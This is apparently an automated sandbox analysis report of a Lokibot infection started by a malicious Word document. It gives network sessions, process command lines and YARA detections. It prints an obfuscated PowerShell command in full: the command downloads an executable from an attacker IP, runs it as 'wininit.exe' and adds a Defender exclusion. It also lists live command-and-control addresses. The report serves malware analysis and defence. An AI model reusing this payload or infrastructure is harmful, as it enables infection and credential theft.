                                                Nov 20, 2024 10:13:18.056701899 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:18.831449032 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:18 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                110192.168.2.224927894.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:18.979660034 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:18.985728025 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:19.881263971 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:19 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                111192.168.2.224927994.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:20.023081064 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:20.030600071 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:20.786156893 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:20 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                112192.168.2.224928094.156.177.4180
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:21.130464077 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:21.135704994 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:21.864723921 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:21 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.2249161198.244.140.414433292C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                TimestampBytes transferredDirectionData
                                                2024-11-20 09:11:03 UTC131OUTOPTIONS / HTTP/1.1
                                                User-Agent: Microsoft Office Protocol Discovery
                                                Host: provit.uk
                                                Content-Length: 0
                                                Connection: Keep-Alive
                                                2024-11-20 09:11:03 UTC408INHTTP/1.1 200 OK
                                                Allow: GET,HEAD
                                                Content-Length: 8
                                                Content-Type: text/html; charset=utf-8
                                                Date: Wed, 20 Nov 2024 09:11:03 GMT
                                                Etag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                X-Content-Type-Options: nosniff
                                                X-Dns-Prefetch-Control: off
                                                X-Download-Options: noopen
                                                X-Frame-Options: SAMEORIGIN
                                                X-Xss-Protection: 1; mode=block
                                                Connection: close
                                                2024-11-20 09:11:03 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                                                Data Ascii: GET,HEAD


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.2249162198.244.140.414433292C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                TimestampBytes transferredDirectionData
                                                2024-11-20 09:11:04 UTC190OUTHEAD /Ib9yLe?&shoelace=strong&skyscraper=discreet&roll=thoughtful&mimosa=wacky&vulture HTTP/1.1
                                                Connection: Keep-Alive
                                                User-Agent: Microsoft Office Existence Discovery
                                                Host: provit.uk
                                                2024-11-20 09:11:04 UTC552INHTTP/1.1 302 Found
                                                Content-Length: 192
                                                Content-Type: text/plain; charset=utf-8
                                                Date: Wed, 20 Nov 2024 09:11:04 GMT
                                                Location: http://66.63.187.231/xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc
                                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                Vary: Accept
                                                X-Content-Type-Options: nosniff
                                                X-Dns-Prefetch-Control: off
                                                X-Download-Options: noopen
                                                X-Frame-Options: SAMEORIGIN
                                                X-Xss-Protection: 1; mode=block
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2192.168.2.2249163198.244.140.41443
                                                TimestampBytes transferredDirectionData
                                                2024-11-20 09:11:09 UTC126OUTOPTIONS / HTTP/1.1
                                                Connection: Keep-Alive
                                                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                translate: f
                                                Host: provit.uk
                                                2024-11-20 09:11:09 UTC408INHTTP/1.1 200 OK
                                                Allow: GET,HEAD
                                                Content-Length: 8
                                                Content-Type: text/html; charset=utf-8
                                                Date: Wed, 20 Nov 2024 09:11:09 GMT
                                                Etag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                X-Content-Type-Options: nosniff
                                                X-Dns-Prefetch-Control: off
                                                X-Download-Options: noopen
                                                X-Frame-Options: SAMEORIGIN
                                                X-Xss-Protection: 1; mode=block
                                                Connection: close
                                                2024-11-20 09:11:09 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                                                Data Ascii: GET,HEAD


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3192.168.2.2249164198.244.140.41443
                                                TimestampBytes transferredDirectionData
                                                2024-11-20 09:11:10 UTC156OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 70 72 6f 76 69 74 2e 75 6b 0d 0a 0d 0a
                                                Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: provit.uk
                                                2024-11-20 09:11:10 UTC404INHTTP/1.1 404 Not Found
                                                Content-Length: 144
                                                Content-Security-Policy: default-src 'none'
                                                Content-Type: text/html; charset=utf-8
                                                Date: Wed, 20 Nov 2024 09:11:10 GMT
                                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                X-Content-Type-Options: nosniff
                                                X-Dns-Prefetch-Control: off
                                                X-Download-Options: noopen
                                                X-Frame-Options: SAMEORIGIN
                                                X-Xss-Protection: 1; mode=block
                                                Connection: close
                                                2024-11-20 09:11:10 UTC144INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4192.168.2.2249165198.244.140.41443
                                                TimestampBytes transferredDirectionData
                                                2024-11-20 09:11:11 UTC156OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 70 72 6f 76 69 74 2e 75 6b 0d 0a 0d 0a
                                                Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: provit.uk
                                                2024-11-20 09:11:11 UTC404INHTTP/1.1 404 Not Found
                                                Content-Length: 144
                                                Content-Security-Policy: default-src 'none'
                                                Content-Type: text/html; charset=utf-8
                                                Date: Wed, 20 Nov 2024 09:11:11 GMT
                                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                X-Content-Type-Options: nosniff
                                                X-Dns-Prefetch-Control: off
                                                X-Download-Options: noopen
                                                X-Frame-Options: SAMEORIGIN
                                                X-Xss-Protection: 1; mode=block
                                                Connection: close
                                                2024-11-20 09:11:11 UTC144INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.2249166198.244.140.414433292C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                TimestampBytes transferredDirectionData
                                                2024-11-20 09:11:12 UTC420OUTGET /Ib9yLe?&shoelace=strong&skyscraper=discreet&roll=thoughtful&mimosa=wacky&vulture HTTP/1.1
                                                Accept: */*
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                UA-CPU: AMD64
                                                Accept-Encoding: gzip, deflate
                                                Host: provit.uk
                                                Connection: Keep-Alive
                                                2024-11-20 09:11:12 UTC540INHTTP/1.1 302 Found
                                                Content-Length: 192
                                                Content-Type: text/plain; charset=utf-8
                                                Date: Wed, 20 Nov 2024 09:11:12 GMT
                                                Location: http://66.63.187.231/xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc
                                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                Vary: Accept
                                                X-Content-Type-Options: nosniff
                                                X-Dns-Prefetch-Control: off
                                                X-Download-Options: noopen
                                                X-Frame-Options: SAMEORIGIN
                                                X-Xss-Protection: 0
                                                Connection: close
                                                2024-11-20 09:11:12 UTC192INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 36 36 2e 36 33 2e 31 38 37 2e 32 33 31 2f 78 61 6d 70 70 2f 77 65 72 2f 77 65 2f 73 65 65 6d 79 62 65 73 74 6f 70 74 69 6f 6e 66 6f 72 65 6e 74 69 72 65 74 69 6d 65 67 69 76 65 6e 6d 65 62 61 63 6b 77 69 74 68 5f 5f 5f 5f 5f 5f 73 75 63 68 61 67 72 65 61 74 74 68 69 67 6e 73 77 69 74 68 65 6e 74 69 72 65 74 69 6d 65 77 69 74 68 6d 65 67 6f 6f 64 5f 5f 5f 5f 5f 5f 73 65 65 74 68 65 62 65 73 74 74 68 69 67 6e 73 61 6c 77 61 79 73 67 69 76 6e 65 62 65 73 74 74 68 69 67 6e 73 2e 64 6f 63
                                                Data Ascii: Found. Redirecting to http://66.63.187.231/xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.2249168198.244.140.414433292C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                TimestampBytes transferredDirectionData
                                                2024-11-20 09:11:14 UTC209OUTHEAD /Ib9yLe?&shoelace=strong&skyscraper=discreet&roll=thoughtful&mimosa=wacky&vulture HTTP/1.1
                                                User-Agent: Microsoft Office Existence Discovery
                                                Host: provit.uk
                                                Content-Length: 0
                                                Connection: Keep-Alive
                                                2024-11-20 09:11:15 UTC552INHTTP/1.1 302 Found
                                                Content-Length: 192
                                                Content-Type: text/plain; charset=utf-8
                                                Date: Wed, 20 Nov 2024 09:11:14 GMT
                                                Location: http://66.63.187.231/xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc
                                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                Vary: Accept
                                                X-Content-Type-Options: nosniff
                                                X-Dns-Prefetch-Control: off
                                                X-Download-Options: noopen
                                                X-Frame-Options: SAMEORIGIN
                                                X-Xss-Protection: 1; mode=block
                                                Connection: close


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:04:10:59
                                                Start date:20/11/2024
                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                Imagebase:0x13f6f0000
                                                File size:1'423'704 bytes
                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
                                                Start time:04:11:14
                                                Start date:20/11/2024
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                Imagebase:0x400000
                                                File size:543'304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:04:11:16
                                                Start date:20/11/2024
                                                Path:C:\Windows\SysWOW64\mshta.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"
                                                Imagebase:0x13b0000
                                                File size:13'312 bytes
                                                MD5 hash:ABDFC692D9FE43E2BA8FE6CB5A8CB95A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:10
                                                Start time:04:11:17
                                                Start date:20/11/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
                                                Imagebase:0x3e0000
                                                File size:427'008 bytes
                                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:13
                                                Start time:04:11:19
                                                Start date:20/11/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt
                                                Imagebase:0x3e0000
                                                File size:427'008 bytes
                                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:14
                                                Start time:04:11:21
                                                Start date:20/11/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline"
                                                Imagebase:0x12d0000
                                                File size:2'140'808 bytes
                                                MD5 hash:F8F36858B9405FBE27377FD7E8FEC2F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:15
                                                Start time:04:11:22
                                                Start date:20/11/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES950F.tmp" "c:\Users\user\AppData\Local\Temp\b2mggwzy\CSC80BAF758EA8A4749878CF9DF238E437.TMP"
                                                Imagebase:0xda0000
                                                File size:46'832 bytes
                                                MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:16
                                                Start time:04:11:27
                                                Start date:20/11/2024
                                                Path:C:\Users\user\AppData\Roaming\wininit.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\wininit.exe"
                                                Imagebase:0xa40000
                                                File size:600'576 bytes
                                                MD5 hash:66B03D1AFF27D81E62B53FC108806211
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                Reputation:low
                                                Has exited:true

                                                Target ID:17
                                                Start time:04:11:29
                                                Start date:20/11/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"
                                                Imagebase:0x3e0000
                                                File size:427'008 bytes
                                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:18
                                                Start time:04:11:29
                                                Start date:20/11/2024
                                                Path:C:\Users\user\AppData\Roaming\wininit.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\wininit.exe"
                                                Imagebase:0xa40000
                                                File size:600'576 bytes
                                                MD5 hash:66B03D1AFF27D81E62B53FC108806211
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000012.00000002.654667913.0000000000534000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
